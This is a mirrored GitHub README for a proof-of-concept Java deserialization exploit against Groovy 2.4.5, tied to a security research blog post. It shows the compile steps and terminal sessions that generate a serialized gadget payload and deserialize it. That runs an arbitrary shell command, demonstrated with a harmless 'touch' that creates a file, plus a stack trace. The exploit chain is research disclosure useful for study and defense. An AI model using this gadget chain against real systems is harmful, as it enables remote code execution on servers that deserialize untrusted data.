Giter VIP home page Giter VIP logo

groovy-2.4.5-exploit's Introduction

groovy-2.4.5-exploit

This is the Java code related to our blog post https://codewhitesec.blogspot.com/2018/01/handcrafted-gadgets.html.

In order to compile the 2 java files you first need to build JRE8Exploit-1.0-SNAPSHOT.jar (project can be found here: https://github.com/pwntester/JRE8u20_RCE_Gadget). And you need a groovy 2.4.5 library, of course.

kai@CodeVM:~/groovy-2.4.5-exploit$ java -version
openjdk version "1.8.0_151"
OpenJDK Runtime Environment (build 1.8.0_151-8u151-b12-0ubuntu0.17.04.2-b12)
OpenJDK 64-Bit Server VM (build 25.151-b12, mixed mode)

Compile code:

kai@CodeVM:~/groovy-2.4.5-exploit$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget.java BCSSerializationTest.java

Create BeanContextSupport example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar BCSSerializationTest > bcstest.bin
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19

Deserialize example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser bcstest.bin
{java.beans.beancontext.BeanContextSupport@27d6c5e0=whatever}

Groovy RCE gadget

kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
ls: cannot access './testforblog': No such file or directory
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget exploit "touch ./testforblog" > exploit.bin
Writing org.codehaus.groovy.runtime.MethodClosure at offset 973
Done writing org.codehaus.groovy.runtime.MethodClosure at offset 1490
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
Adjusting reference from: 4 to: 27
Adjusting reference from: 4 to: 27
Adjusting reference from: 7 to: 30
Adjusting reference from: 1 to: 24
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser exploit.bin
Exception in thread "main" java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.util.Set
	at com.sun.proxy.$Proxy2.entrySet(Unknown Source)
	at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at java.util.HashMap.readObject(HashMap.java:1409)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at Groovy245Gadget.main(Groovy245Gadget.java:43)
kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
-rw-r--r-- 1 kai kai 0 Jan 18 15:29 ./testforblog
kai@CodeVM:~/groovy-2.4.5-exploit$

groovy-2.4.5-exploit's People

Contributors

kaidentity avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.